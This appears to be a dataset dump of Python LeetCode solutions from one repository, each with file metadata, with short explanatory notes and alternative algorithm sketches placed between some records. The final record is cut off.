"alpha_fraction": 0.31170159578323364,
"alphanum_fraction": 0.43740418553352356,
"avg_line_length": 35.588783264160156,
"blob_id": "54060760544211d10b223c7aa0f632cbed2a09d1",
"content_id": "7ba7d7f617497637509e208d46a3b608a9e8ac63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3914,
"license_type": "no_license",
"max_line_length": 925,
"num_lines": 107,
"path": "/Max Points on a Line.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a point\n# class Point:\n# def __init__(self, a=0, b=0):\n# self.x = a\n# self.y = b\n\n\nclass Solution:\n def gcd(self, a, b):\n if b != 0:\n return self.gcd(b, a % b)\n else:\n return a\n\n def reduce(self, p):\n if (p.x ** 2 + p.y ** 2) == 0:\n return '0 0'\n m = self.gcd(p.x, p.y)\n #print(str(p) + \",\" + str(m))\n return str(p.x / m) + ',' + str(p.y / m)\n\n # @param points, a list of Points\n # @return an integer\n def maxPoints(self, points):\n \"\"\"Given n points on a 2D plane, \\\nfind the maximum number of points that lie on the same straight line.\"\"\"\n count = len(points)\n if count < 3:\n return count\n res = 0\n for p in points:\n slopes = [self.reduce(Point(p1.x - p.x, p1.y - p.y)) for p1 in points]\n lines = {}\n for slope in slopes:\n if lines.get(slope) is None:\n lines[slope] = 1\n else:\n lines[slope] = lines.pop(slope) + 1\n for line in lines:\n tmp = lines[line]\n if line != '0 0':\n tmp += lines['0 0']\n if tmp > res:\n res = tmp\n return res\n\n # @param points, a list of Points\n # @return an integer\n def maxPointsTLE(self, points):\n \"\"\"Given n points on a 2D plane, \\\nfind the maximum number of points that lie on the same straight line.\"\"\"\n count = len(points)\n if count < 3:\n return count\n res = 2\n for i in range(0, count - 1):\n if count - i <= res:\n break\n for j in range(i + 1, count):\n tmp = 2\n for k in range(0, count):\n if k == i or k == j:\n continue\n inline = self.pointInLine(points[i], points[j], points[k])\n if inline:\n if k < j:\n break\n else:\n tmp += 1\n if tmp > res:\n res = tmp\n return res\n\n def vectorInLine(self, v1, v2):\n return v1.x * v2.y == v2.x * v1.y\n\n def pointInLine(self, p1, p2, p3):\n v1 = Point(p2.x - p1.x, p2.y - p1.y)\n v2 = Point(p3.x - p1.x, p3.y - p1.y)\n return self.vectorInLine(v1, v2)\n\n\nclass Point:\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\n def __str__(self):\n return str(self.x) + \" \" + str(self.y)\n\n\nlin = [(0, 0), (1, 1), (1, -1)]\nlin1 = [(560,248),(0,16),(30,250),(950,187),(630,277),(950,187),(-212,-268),(-287,-222),(53,37),(-280,-100),(-1,-14),(-5,4),(-35,-387),(-95,11),(-70,-13),(-700,-274),(-95,11),(-2,-33),(3,62),(-4,-47),(106,98),(-7,-65),(-8,-71),(-8,-147),(5,5),(-5,-90),(-420,-158),(-420,-158),(-350,-129),(-475,-53),(-4,-47),(-380,-37),(0,-24),(35,299),(-8,-71),(-2,-6),(8,25),(6,13),(-106,-146),(53,37),(-7,-128),(-5,-1),(-318,-390),(-15,-191),(-665,-85),(318,342),(7,138),(-570,-69),(-9,-4),(0,-9),(1,-7),(-51,23),(4,1),(-7,5),(-280,-100),(700,306),(0,-23),(-7,-4),(-246,-184),(350,161),(-424,-512),(35,299),(0,-24),(-140,-42),(-760,-101),(-9,-9),(140,74),(-285,-21),(-350,-129),(-6,9),(-630,-245),(700,306),(1,-17),(0,16),(-70,-13),(1,24),(-328,-260),(-34,26),(7,-5),(-371,-451),(-570,-69),(0,27),(-7,-65),(-9,-166),(-475,-53),(-68,20),(210,103),(700,306),(7,-6),(-3,-52),(-106,-146),(560,248),(10,6),(6,119),(0,2),(-41,6),(7,19),(30,250)]\nlin2 = [(1, 1), (1, 1), (1, 1)]\nlin3 = [(1, 1), (1, 1), (2, 2), (2, 2)]\nlins = [lin, lin1, lin2, lin3]\n\nfor lint in lins:\n points = []\n for kv in lint:\n #print(kv)\n points.append(Point(kv[0], kv[1]))\n #print(points)\n ss = Solution()\n print(len(lint), lint)\n print(ss.maxPoints(points))\n print()"
},
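The slope keys are what make or break this approach: reducing each direction vector by its gcd keeps the keys exact integers, and a canonical sign folds opposite rays through the anchor onto one key. A standalone restatement of just that idea (function names are mine, not from the file):

from math import gcd

def slope_key(dx, dy):
    # (0, 0) is the anchor point itself, kept separate like '0 0' above
    if dx == 0 and dy == 0:
        return 'same'
    g = gcd(dx, dy)                        # math.gcd is always non-negative
    dx, dy = dx // g, dy // g
    if dx < 0 or (dx == 0 and dy < 0):
        dx, dy = -dx, -dy                  # canonical sign for the direction
    return (dx, dy)

assert slope_key(0, 5) == slope_key(0, -5) == (0, 1)   # one vertical line
assert slope_key(2, 4) == slope_key(-1, -2) == (1, 2)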
{
"alpha_fraction": 0.4475597143173218,
"alphanum_fraction": 0.475597083568573,
"avg_line_length": 26.542856216430664,
"blob_id": "899b429a6149e7566c7cc2d88cb70b97827b61c0",
"content_id": "26d4a004a437c13f023c53ccb6216173d24ee955",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 35,
"path": "/Permutations II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return a list of lists of integers\n def permuteUnique(self, num):\n '''\n Given a collection of numbers that might contain duplicates, return all possible unique permutations.\n\nFor example,\n[1,1,2] have the following unique permutations:\n[1,1,2], [1,2,1], and [2,1,1]. \n '''\n def nextPermutation(a):\n k = len(a) - 1\n while k > 0 and a[k - 1] >= a[k]:\n k -= 1\n i = k - 1\n if i == -1:\n return False\n while k < len(a) and a[k] > a[i]:\n k += 1\n k -= 1\n a[i], a[k] = a[k], a[i]\n a[i + 1:] = reversed(a[i + 1:])\n return True\n\n num.sort()\n res = [list(num)]\n while nextPermutation(num):\n res.append(list(num))\n return res\n\na1 = [1, 2, 3]\na = a1\nprint(a)\nprint(Solution.permuteUnique(Solution(), a))"
},
{
"alpha_fraction": 0.4206755459308624,
"alphanum_fraction": 0.45854657888412476,
"avg_line_length": 26.94285774230957,
"blob_id": "7945693ace8ae1adced9e4ba037fa370136735cc",
"content_id": "2820d5ddceff6d6c78fb9641b25658d831c7b500",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 985,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 35,
"path": "/Search Insert Position.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding: utf-8\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be inserted\n # @return integer\n def searchInsert(self, A, target):\n '''\n Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n[1,3,5,6], 5 → 2\n[1,3,5,6], 2 → 1\n[1,3,5,6], 7 → 4\n[1,3,5,6], 0 → 0 \n '''\n if len(A) == 0:\n return -1\n if target <= A[0]:\n return 0\n l = 0\n r = len(A) - 1\n while l <= r:\n mid = (l + r) // 2\n if A[mid] == target:\n if mid > 0 and A[mid - 1] == target:\n r = mid - 1\n else:\n return mid\n elif A[mid] > target:\n r = mid - 1\n else:\n l = mid + 1\n return l"
},
{
"alpha_fraction": 0.5634218454360962,
"alphanum_fraction": 0.5860373377799988,
"avg_line_length": 32.93333435058594,
"blob_id": "a82d415d2f19322e8f38e247f02a1a4831a35afc",
"content_id": "5d055046e242ac90e05b9e17db65f1fc66442df2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 30,
"path": "/Letter Combinations of a Phone Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of strings, [s1, s2]\n def letterCombinations(self, digits):\n '''\n Given a digit string, return all possible letter combinations that the number could represent.\n\nA mapping of digit to letters (just like on the telephone buttons) is given below.\n\nInput:Digit string \"23\"\nOutput: [\"ad\", \"ae\", \"af\", \"bd\", \"be\", \"bf\", \"cd\", \"ce\", \"cf\"].\n\nNote:\nAlthough the above answer is in lexicographical order, your answer could be in any order you want. \n '''\n dig2charDic = {'2': \"abc\", '3': \"def\", '4': \"ghi\", '5': \"jkl\", '6': \"mno\", '7': \"pqrs\", '8': \"tuv\", '9': \"wxyz\"}\n res = []\n self.dfs(digits, \"\", dig2charDic, res)\n return res\n\n def dfs(self, digits, chars, dig2charDic, res):\n if digits == \"\":\n res.append(chars)\n return\n for c in dig2charDic[digits[0]]:\n self.dfs(digits[1:], chars + c, dig2charDic, res)\n\nd0 = \"23\"\nd = d0\nprint(d)\nprint(Solution.letterCombinations(Solution(), d))"
},
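The recursion above enumerates a cartesian product over the per-digit letter groups; itertools.product states that directly. A standalone sketch (my naming; note it returns [] for an empty digit string, where the class above returns [""]):

from itertools import product

def letter_combinations(digits):
    pad = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl',
           '6': 'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}
    if not digits:
        return []
    # product varies the rightmost group fastest, matching the DFS order
    return [''.join(p) for p in product(*(pad[d] for d in digits))]

assert letter_combinations('23') == ['ad', 'ae', 'af', 'bd', 'be', 'bf',
                                     'cd', 'ce', 'cf']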
{
"alpha_fraction": 0.38950276374816895,
"alphanum_fraction": 0.4019336998462677,
"avg_line_length": 23.965517044067383,
"blob_id": "216c415380546169d2341862f01c792f8c2b02f8",
"content_id": "f6f4b0ad59df12ad556b1728a6c7696ac47abb6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 724,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 29,
"path": "/Divide Two Integers.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def divide(self, dividend, divisor):\n '''\n Divide two integers without using multiplication, division and mod operator. \n '''\n x, y = dividend, divisor\n sign = 1\n if x < 0:\n x *= -1\n sign *= -1\n if y < 0:\n y *= -1\n sign *= -1\n c, x = self.help(x, y)\n while x >= y:\n r, x = self.help(x, y)\n c += r\n return c * sign\n \n def help(self, a, b):\n if a < b:\n return [0, a]\n counter = 1\n t = b\n while a >= t + t:\n t = t + t\n counter = counter + counter\n return [counter, a - t]\n"
},
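The help() routine above is binary long division: double the divisor until the next doubling would overshoot, subtract, repeat. Tracing it on small numbers makes that concrete; this is an illustrative re-sketch of the same doubling loop, not the original class:

def trace_divide(x, y):
    total = 0
    while x >= y:
        t, counter = y, 1
        while x >= t + t:                  # double until the next step overshoots
            t, counter = t + t, counter + counter
        total, x = total + counter, x - t  # e.g. 100 // 7: subtract 56, add 8
    return total

assert trace_divide(100, 7) == 14          # 8 + 4 + 2
assert trace_divide(6, 7) == 0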
{
"alpha_fraction": 0.45448505878448486,
"alphanum_fraction": 0.4903654456138611,
"avg_line_length": 25.89285659790039,
"blob_id": "f6e358ff749fc2a102798b5a057648d5d627ea08",
"content_id": "2c483bcdb8714ba9556909502d0e15871ece3cd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1511,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 56,
"path": "/Next Permutation.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @param num, a list of integer\n # @return a list of integer\n def nextPermutation(self, num):\n '''\n Implement next permutation, which rearranges numbers into the lexicographically next greater permutation of numbers.\n\nIf such arrangement is not possible, it must rearrange it as the lowest possible order (ie, sorted in ascending order).\n\nThe replacement must be in-place, do not allocate extra memory.\n\nHere are some examples. Inputs are in the left-hand column and its corresponding outputs are in the right-hand column.\n1,2,3 → 1,3,2\n3,2,1 → 1,2,3\n1,1,5 → 1,5,1\n '''\n n = len(num)\n x = -1\n for i in range(n - 1, 0, -1):\n if num[i - 1] < num[i]:\n x = i - 1\n break\n if x == -1:\n self.reverse(num)\n return num\n y = x + 1\n for j in range(x + 1, n):\n if num[x] >= num[j]:\n y = j - 1\n break\n if num[x] < num[n - 1]:\n y = n - 1\n t = num[x]\n num[x] = num[y]\n num[y] = t\n num[x + 1:] = self.reverse(num[x + 1:])\n return num\n\n def reverse(self, a):\n l = 0\n r = len(a) - 1\n while l < r:\n t = a[l]\n a[l] = a[r]\n a[r] = t\n l += 1\n r -= 1\n return a\n\ns0 = [1]\ns1 = [1, 3, 2]\ns2 = [2,2,7,5,4,3,2,2,1]\ns = s2\nprint(len(s), s)\nprint(Solution.nextPermutation(Solution(), s))"
},
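The same three steps can be written without the y-override special casing, and validated against an itertools brute force. All names below are mine; the brute force deduplicates because inputs may contain repeats:

from itertools import permutations

def next_permutation_sketch(a):
    i = len(a) - 2
    while i >= 0 and a[i] >= a[i + 1]:     # step 1: rightmost ascent
        i -= 1
    if i < 0:
        a.reverse()                        # largest permutation wraps to smallest
        return a
    j = len(a) - 1
    while a[j] <= a[i]:                    # step 2: rightmost element > a[i]
        j -= 1
    a[i], a[j] = a[j], a[i]
    a[i + 1:] = reversed(a[i + 1:])        # step 3: sort the descending suffix
    return a

def reference(a):
    perms = sorted(set(permutations(a)))
    k = perms.index(tuple(a))
    return list(perms[(k + 1) % len(perms)])   # wraps around, as specified

for case in ([1, 2, 3], [3, 2, 1], [1, 1, 5], [2, 2, 7, 5, 4, 3, 2, 2, 1]):
    assert next_permutation_sketch(list(case)) == reference(case)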
{
"alpha_fraction": 0.5149583220481873,
"alphanum_fraction": 0.5203531384468079,
"avg_line_length": 25.842105865478516,
"blob_id": "172f5cb1a81b13d7fbc755226da73a11e899f5a5",
"content_id": "8645cbc012a58a9e8daf1e4ec46019db2ec6eac6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2039,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 76,
"path": "/Recover Binary Search Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n # @param root, a tree node\n # @return a tree node\n def recoverTree(self, root):\n ''' Two elements of a binary search tree (BST) are swapped by mistake.\n\nRecover the tree without changing its structure.\nNote:\nA solution using O(n) space is pretty straight forward. Could you devise a constant space solution?\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n errlist = []\n self.validBST(root, None, None, errlist)\n if len(errlist) == 0:\n return root\n minn = errlist[0][0]\n maxn = errlist[0][0]\n for item in errlist:\n for x in item:\n if x.val > maxn.val:\n maxn = x\n if x.val < minn.val:\n minn = x\n t = minn.val\n minn.val = maxn.val\n maxn.val = t\n return root\n\n def validBST(self, node, l, r, errlist):\n if node is None:\n return True\n if l and node.val <= l.val:\n errlist.append([l, node])\n if r and node.val >= r.val:\n errlist.append([r, node])\n self.validBST(node.left, l, node, errlist)\n self.validBST(node.right, node, r, errlist)\n\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def show(self):\n if self is None:\n return\n print(self.val, end=\" \")\n if self.left or self.right:\n if self.left:\n self.left.show()\n else:\n print(\"#\", end=\" \")\n if self.right:\n self.right.show()\n else:\n print(\"#\", end=\" \")\n\na = TreeNode(2)\nb = TreeNode(3)\nc = TreeNode(1)\na.right = b\nb.left = c\ns = Solution()\nx = s.recoverTree(a)\nx.show()\nprint()"
},
{
"alpha_fraction": 0.6052631735801697,
"alphanum_fraction": 0.6255060434341431,
"avg_line_length": 28.117647171020508,
"blob_id": "2ffca39cfe1bfb76f5a3a11c8f4e4f50518bf791",
"content_id": "4aeff29c6311511148b8cd522ce384e97cb56848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 494,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 17,
"path": "/Single Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integer\n # @return an integer\n def singleNumber(self, A):\n '''Given an array of integers, every element appears twice except for one. Find that single one.\n\nNote:\nYour algorithm should have a linear runtime complexity. Could you implement it without using extra memory? '''\n res = 0\n for a in A:\n res = res ^ a\n return res\n\nA = [1, 2, 3, 3, 2, 1, 4, 5, 4]\nso = Solution()\nres = so.singleNumber(A)\nprint(res)"
},
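The cancellation law behind this (a ^ a == 0 and a ^ 0 == a, with XOR associative and commutative) can be spot-checked directly; an illustrative check, not from the file:

from functools import reduce
from operator import xor

assert reduce(xor, [1, 2, 3, 3, 2, 1, 4, 5, 4]) == 5   # pairs annihilate
assert 7 ^ 7 == 0 and 0 ^ 9 == 9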
{
"alpha_fraction": 0.40365681052207947,
"alphanum_fraction": 0.4331927001476288,
"avg_line_length": 24.428571701049805,
"blob_id": "a1c071fe62d225da8b5979aeb63da88e70600631",
"content_id": "c9ebff6afac86a462fdd24da18af5c25ce176994",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 711,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 28,
"path": "/Remove Duplicates from Sorted Array II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @return an integer\n def removeDuplicates(self, A):\n '''\n Follow up for \"Remove Duplicates\":\nWhat if duplicates are allowed at most twice?\n\nFor example,\nGiven sorted array A = [1,1,1,2,2,3],\n\nYour function should return length = 5, and A is now [1,1,2,2,3]. \n '''\n if len(A) <= 1:\n return len(A)\n count = 1\n i = 1\n while i < len(A):\n if A[i] == A[i - 1]:\n count += 1\n if count > 2:\n del A[i]\n continue\n i += 1\n else:\n count = 1\n i += 1\n return len(A)"
},
{
"alpha_fraction": 0.4674573242664337,
"alphanum_fraction": 0.4900202453136444,
"avg_line_length": 30.153152465820312,
"blob_id": "443bd32e875f1285d7014d9a14d2b77147809809",
"content_id": "00a51495c30b42a20bb1af210d6e5e206f75362e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3457,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 111,
"path": "/Merge Intervals.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution:\n # @param intervals, a list of Interval\n # @return a list of Interval\n def merge(self, intervals):\n '''\n Given a collection of intervals, merge all overlapping intervals.\n\nFor example,\nGiven [1,3],[2,6],[8,10],[15,18],\nreturn [1,6],[8,10],[15,18]. \n '''\n if len(intervals) == 0:\n return []\n return self.solution_sort(intervals)\n #return self.solution_discrete(intervals)\n\n #388ms\n def solution_sort(self, intervals):\n def intervalCmp(x, y):\n return cmp(x.start, y.start)\n intervals.sort(cmp=intervalCmp)\n l, r = intervals[0].start, intervals[0].end\n ans = []\n for i in range(1, len(intervals)):\n if intervals[i].start <= r:\n r = max(r, intervals[i].end)\n else:\n ans.append(Interval(l, r))\n l, r = intervals[i].start, intervals[i].end\n ans.append(Interval(l, r))\n return ans\n\n #364ms\n def solution_discrete(self, intervals):\n allValues = []\n for iv in intervals:\n allValues.append(iv.start)\n allValues.append(iv.end)\n allValues.sort()\n valueIndexMap = {}\n indexValueList = []\n k = -1\n for i in range(len(allValues)):\n if i > 0 and allValues[i] == allValues[i - 1]:\n continue\n elif i > 0 and allValues[i] > allValues[i - 1] + 1:\n k += 1\n valueIndexMap[allValues[i - 1] + 1] = k\n indexValueList.append(allValues[i - 1] + 1)\n k += 1\n valueIndexMap[allValues[i]] = k\n indexValueList.append(allValues[i])\n #print(allValues)\n #print(indexValueList)\n #print(valueIndexMap)\n indexIntervals = []\n for iv in intervals:\n indexIntervals.append(Interval(valueIndexMap[iv.start], valueIndexMap[iv.end]))\n\n def solution_array(indexIntervals, n):\n cover = [0] * n\n for iv in indexIntervals:\n cover[iv.start] = max(cover[iv.start], iv.end - iv.start + 1)\n ans = []\n l, r = 0, 0\n while True:\n while l < n and cover[l] == 0:\n l += 1\n if l == n:\n break\n r = l\n lens = cover[l] -1\n while lens > 0:\n r += 1\n lens -= 1\n if r < n:\n lens = max(lens, cover[r] - 1)\n ans.append(Interval(l, r))\n l = r + 1\n return ans\n indexAns = solution_array(indexIntervals, len(indexValueList))\n ans = []\n for indexIv in indexAns:\n ans.append(Interval(indexValueList[indexIv.start], indexValueList[indexIv.end]))\n return ans\n\nclass Interval:\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n def __str__(self):\n return \"[\" + str(self.start) + \", \" + str(self.end) + \"]; \"\n\n\ns1 = [[1,3], [6,7], [2, 4]]\ns2 = [[1,4], [5,6]]\ns3 = [[1,4],[0,0]]\nss = s3\ns = []\nfor iv in ss:\n s.append(Interval(iv[0], iv[1]))\nprint(''.join([str(i) for i in s]))\nans = Solution.merge(Solution(), s)\nif ans:\n print(''.join([str(i) for i in ans]))"
},
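solution_sort is the sweep most people reach for; on plain (start, end) tuples the whole idea fits in a few lines, which also shows why a key-based sort is all Python 3 needs here (standalone sketch, my naming):

def merge_tuples(ivs):
    out = []
    for s, e in sorted(ivs):               # tuples sort by start, then end
        if out and s <= out[-1][1]:
            out[-1] = (out[-1][0], max(out[-1][1], e))   # overlap: extend
        else:
            out.append((s, e))
    return out

assert merge_tuples([(1, 3), (2, 6), (8, 10), (15, 18)]) == [(1, 6), (8, 10), (15, 18)]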
{
"alpha_fraction": 0.4941069781780243,
"alphanum_fraction": 0.49954667687416077,
"avg_line_length": 26.600000381469727,
"blob_id": "d5a0dc81771305186202303ba92f36b60a9b7f4a",
"content_id": "7e36a35446a012c002f601bb57cafc178b2063f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 40,
"path": "/Simplify Path.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param path, a string\n # @return a string\n def simplifyPath(self, path):\n '''\n Given an absolute path for a file (Unix-style), simplify it.\n\nFor example,\npath = \"/home/\", => \"/home\"\npath = \"/a/./b/../../c/\", => \"/c\"\n\nclick to show corner cases.\nCorner Cases:\n\n Did you consider the case where path = \"/../\"?\n In this case, you should return \"/\".\n Another corner case is the path might contain multiple slashes '/' together, such as \"/home//foo/\".\n In this case, you should ignore redundant slashes and return \"/home/foo\".\n '''\n names = path.split('/')\n stack = []\n for name in names:\n if name == '.' or name == '':\n continue\n elif name == '..':\n if len(stack) == 0:\n continue\n else:\n stack.pop()\n else:\n stack.append(name)\n return '/' + '/'.join(stack)\n\np1 = '/.././'\np2 = \"/home/\"\np3 = \"/a/./b/../../c/\"\np4 = \"/home//foo/\"\np = p4\nprint(p)\nprint(Solution.simplifyPath(Solution(), p))"
},
{
"alpha_fraction": 0.38420742750167847,
"alphanum_fraction": 0.40601059794425964,
"avg_line_length": 25.123077392578125,
"blob_id": "73cfa3ebb77385ff25ed228e7ed6cd157fc5d897",
"content_id": "1a4872b9e47371ca716a9e13360fbb3ce0f3099f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1697,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 65,
"path": "/Search in Rotated Sorted Array.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n def search(self, A, target):\n '''\n Suppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nYou are given a target value to search. If found in the array return its index, otherwise return -1.\n\nYou may assume no duplicate exists in the array.\n '''\n #return self.directBS(A, target)\n return self.povitFirstBS(A, target)\n\n def directBS(self, A, target):\n l = 0\n r = len(A) - 1\n while l < r:\n mid = (l + r) // 2\n if A[mid] >= A[l]:\n if A[l] <= target <= A[mid]:\n r = mid\n else:\n l = mid + 1\n else:\n if A[mid] <= target <= A[r]:\n l = mid\n else:\n r = mid - 1\n if A[l] != target:\n l = -1\n return l\n\n def povitFirstBS(self, A, x):\n n = len(A)\n l = 0\n r = len(A) - 1\n while l < r:\n mid = (l + r) // 2\n if A[mid] > A[r]:\n l = mid + 1\n else:\n r = mid\n povit = l\n l = 0\n r = n - 1\n while l < r:\n mid = (l + r) // 2\n rmid = (mid + povit) % n\n if A[rmid] >= x:\n r = mid\n else:\n l = mid + 1\n res = (l + povit) % n\n if A[res] != x:\n res = -1\n return res\n\ns0 = [[3, 1], 1]\ns = s0\nprint(s)\nprint(Solution.search(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.38847583532333374,
"alphanum_fraction": 0.4479553997516632,
"avg_line_length": 28.91666603088379,
"blob_id": "b0bdf3e0830c991c27e9ea9b04c553fc0219e262",
"content_id": "b58e4e860f0d5d71e8434d7578e201a7352f7eb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1076,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 36,
"path": "/Interleaving String.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isInterleave(self, s1, s2, s3):\n ''' Given s1, s2, s3, find whether s3 is formed by the interleaving of s1 and s2.\n\nFor example,\nGiven:\ns1 = \"aabcc\",\ns2 = \"dbbca\",\n\nWhen s3 = \"aadbbcbcac\", return true.\nWhen s3 = \"aadbbbaccc\", return false. '''\n l1 = len(s1)\n l2 = len(s2)\n l3 = len(s3)\n if l1 + l2 != l3:\n return False\n f = [[False] * (l2 + 1) for row in range(l1 + 1)]\n f[0][0] = True\n for i in range(1, l1 + 1):\n if s1[:i] == s3[:i]:\n f[i][0] = True\n for i in range(1, l2 + 1):\n if s2[:i] == s3[:i]:\n f[0][i] = True\n for i in range(1, l1 + 1):\n for j in range(1, l2 + 1):\n f[i][j] = (f[i - 1][j] and s1[i - 1] == s3[i + j - 1]) or \\\n (f[i][j - 1] and s2[j - 1] == s3[i + j - 1])\n return f[l1][l2]\n\ns0 = [\"aabcc\", \"dbbca\", \"aadbbcbcac\"]\ns1 = [\"aabcc\", \"dbbca\", \"aadbbbaccc\"]\na = s1\ns = Solution()\nprint(s.isInterleave(a[0], a[1], a[2]))"
},
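Each dp row above depends only on the previous row, so the table compresses to a single row of length len(s2) + 1. A standalone sketch of that space optimisation (my naming):

def is_interleave_1d(s1, s2, s3):
    if len(s1) + len(s2) != len(s3):
        return False
    f = [False] * (len(s2) + 1)
    f[0] = True
    for j in range(1, len(s2) + 1):        # first row: s3 built from s2 alone
        f[j] = f[j - 1] and s2[j - 1] == s3[j - 1]
    for i in range(1, len(s1) + 1):
        f[0] = f[0] and s1[i - 1] == s3[i - 1]
        for j in range(1, len(s2) + 1):
            # f[j] still holds the previous row; f[j - 1] is the current row
            f[j] = (f[j] and s1[i - 1] == s3[i + j - 1]) or \
                   (f[j - 1] and s2[j - 1] == s3[i + j - 1])
    return f[len(s2)]

assert is_interleave_1d("aabcc", "dbbca", "aadbbcbcac") is True
assert is_interleave_1d("aabcc", "dbbca", "aadbbbaccc") is False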
{
"alpha_fraction": 0.5802919864654541,
"alphanum_fraction": 0.6049270033836365,
"avg_line_length": 24.488372802734375,
"blob_id": "f0163d60ae40f6741397c18e0ccf926bd9dc009a",
"content_id": "7c5ebea9d67cbfda86d11751dd0836fadf3179f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 43,
"path": "/Symmetric Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isSymmetric(self, root):\n '''Given a binary tree, check whether it is a mirror of itself (ie, symmetric around its center).\n\nFor example, this binary tree is symmetric:\n\n 1\n / \\\n 2 2\n / \\ / \\\n3 4 4 3\n\nBut the following is not:\n\n 1\n / \\\n 2 2\n \\ \\\n 3 3\n\nNote:\nBonus points if you could solve it both recursively and iteratively.\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n if root is None:\n return True\n return self.symmetric(root.left, root.right)\n\n def symmetric(self, node1, node2):\n if node1 is None and node2 is None:\n return True\n if node1 is None or node2 is None:\n return False\n return node1.val == node2.val and self.symmetric(node1.left, node2.right) and self.symmetric(node1.right, node2.left)\n"
},
{
"alpha_fraction": 0.434815376996994,
"alphanum_fraction": 0.45742276310920715,
"avg_line_length": 32.17499923706055,
"blob_id": "a3a165560fc76d0e752852827f283f1aeb84ee43",
"content_id": "2ba3c36df4e58e6819de6da5eb8e369ca122e518",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 40,
"path": "/Set Matrix Zeroes.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
